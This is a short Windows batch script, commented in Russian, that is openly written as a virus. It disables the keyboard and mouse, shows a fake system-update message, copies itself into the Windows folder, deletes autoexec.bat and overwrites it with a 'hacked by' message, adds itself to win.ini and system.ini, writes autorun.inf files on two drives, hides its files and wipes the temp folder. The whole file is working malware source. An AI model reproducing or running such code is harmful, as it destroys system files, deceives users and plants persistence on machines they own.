@echo off rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол rundll32 keyboard,disable //Было rundll32 mouse,disable //Было rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши echo Обновление параметров системы, пожалуйста подождите... //пишет отмазку :) label mp_k //Меняем имя диску copy mp_k.exe %windir% //Копирует себя в папку windows if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r deltree /y c:\autoexec.bat if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER....[]=[_H@CKED_BY_[kas]*_"SmallPox_Vir_Org"_] > c:\autoexec.bat echo run = %windir%\mp_k.exe >> %windir%\win.ini echo run = %windir%\mp_k.exe >> %windir%\system.ini echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе. echo open=c:\autoexec.bat > c:\autorun.inf echo [AutoRun] > d:\autorun.inf echo open=c:\autoexec.bat > d:\autorun.inf rundll32 mouse,enable rundll32 keyboard,enable echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js echo WSHShell.Popup("Warning,.. А теперь необходимо перезагрузиться"); >> %temp%\mes.js start %temp%\mes.js deltree /y %temp%\mes.js attrib c:\autoexec.bat +h +s +a +r attrib %windir%\mp_k.exe +h +s +a +r attrib c:\autorun.inf +h +s +a +r attrib d:\autorun.inf +h +s +a +r deltree /y mp_k.exe rmdir %windir%\temp //Удаляем папку temp mkdir %windir%\temp //Создаем папку temp cls